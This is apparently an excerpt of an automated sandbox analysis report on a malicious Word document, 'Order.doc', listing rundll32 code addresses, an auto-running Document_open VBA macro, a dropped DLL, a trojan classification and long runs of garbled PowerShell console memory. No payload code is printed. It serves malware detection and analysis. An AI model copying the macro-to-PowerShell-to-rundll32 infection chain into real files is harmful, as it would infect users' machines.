                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022EF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022FF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00239333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023D138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023B706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00224304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00225D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00220D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00232179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00224D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00222353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022EB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00236158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023C5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00237FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00231BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002341AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00223DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022D5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00221983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022DB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022F797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00229D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0023819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022FBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022B3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_002227F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0022D3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008A303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_008B1E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC017
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4012
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F0604
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FCA55
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EC851
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FBC4D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9846
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FCC7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4478
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EE272
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9665
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9A99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F34BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F90BE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB6B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2EAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E70AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E28AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC4A5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E6CA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E92A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EE8DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9EDA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB8D8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FA6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F08CF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F34C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F38C2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F00FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F14FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F66FB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E50F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E68EC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E30E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F891E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2515
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB10A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB706
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4304
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD138
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9333
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7132
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EEF2E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EF52E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EFF2C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F3D29
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3523
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EA323
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC15B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6158
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EEB54
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2353
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E4D48
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E177C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E0D7A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2179
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1372
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E2B70
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E5D63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F819F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EF797
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E9D95
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EF793
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E498C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E598B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EDB86
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E1983
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E3DB8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ED5B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F41AB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7FA7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1BA5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC5A1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001ED3F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001E27F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EB3E8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001EFBE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0043303C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00441E14
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A821
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00286417
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00284844
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00295250
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028CAA3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029A0F1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028D2DD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029434E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002947B5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00290B8A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00284D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029CBE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00298C2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029D02D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00290223
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00292631
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00298A33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00294C37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00282208
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028240F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00292C05
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00281806
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285418
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028E612
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029AA7B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028327F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00290672
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028BE74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028E044
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028DE81
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00294A9E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00291090
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029D4E1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028ECFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028D6F0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A6C9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029C6D9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A2D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00289D2F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028A525
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283938
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287B39
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029CF31
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287731
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283336
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029D70B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00294F04
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00289106
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028F369
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028C364
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029B165
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029A966
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287378
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00285B7D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283B74
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00299B4A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00293F4F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028C145
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029135B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002993AA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00283FAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028ADAF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00292FA1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002909B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028F9BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028FFBA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00299DBF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00297BBE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00291F88
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00297187
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00293590
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029C192
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028BB96
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002867EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0028F5E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00296BE4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002835FC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00287FFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00291DFE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029BBF1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0029DBC4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00282DDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002857D4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00209C3D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00210604
                      Source: Order.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Ynzysnuyyfihfq23d, Function Document_open
                      Source: Order.docOLE indicator, VBA macros: true
                      Source: J47K.dll.5.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
                      Source: powershell.exe, 00000005.00000002.2098143129.000000001CC20000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.2094919948.0000000001BE0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2093582036.0000000001FC0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2095246701.0000000001F00000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2097926518.0000000001F40000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.evad.winDOC@20/8@2/3
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Order.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRBF29.tmpJump to behavior
                      Source: Order.docOLE indicator, Word Document stream: true
                      Source: Order.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ........................................ .?.......?...............&.....X.&.............#...............................h.......5kU.......&.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ................|...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........&.....L.................&.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K........`.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................&L.j......................#.............}..v....x.......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....................&L.j..... #...............#.............}..v............0.N...............`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................M.j......................#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.....................M.j......`...............#.............}..v....h.......0.N...............`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............VM.j......................#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............VM.j..... #...............#.............}..v............0.N.............h.`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....J`...............#.............}..v....01......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....7..................j.....1................#.............}..v....h2......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....J`...............#.............}..v....09......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....C..................j.....9................#.............}..v....h:......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....J`...............#.............}..v....0A......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....O..................j.....A................#.............}..v....hB......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[.......e.s. .a.r.e. .".S.s.l.3.,. .T.l.s."...".........}..v.....F......0.N.............8G`.....(.......|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....[..................j....8G................#.............}..v.....G......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.4.7.4.............}..v.....K......0.N.............8G`.....$.......|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....g..................j.....L................#.............}..v.....M......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.....J`...............#.............}..v.....S......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....s..................j.....T................#.............}..v.....U......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....[......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....\................#.............}..v.....]......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....c......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....d................#.............}..v.....e......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....k......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....l................#.............}..v.....m......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....s......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....t................#.............}..v.....u......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v.....{......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....|................#.............}..v.....}......0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....3..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....?..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................E.......K..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....K..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....W..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....c..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....o..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....{..................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v............0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v............8.8.'.+.'.V.'.).).`...............#.............}..v............0.N.............8G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....H.................#.............}..v............0.N..............G`.............|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j.....J`...............#.............}..v....p ......0.N.............................|...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....(!................#.............}..v.....!......0.N..............G`.............|...............
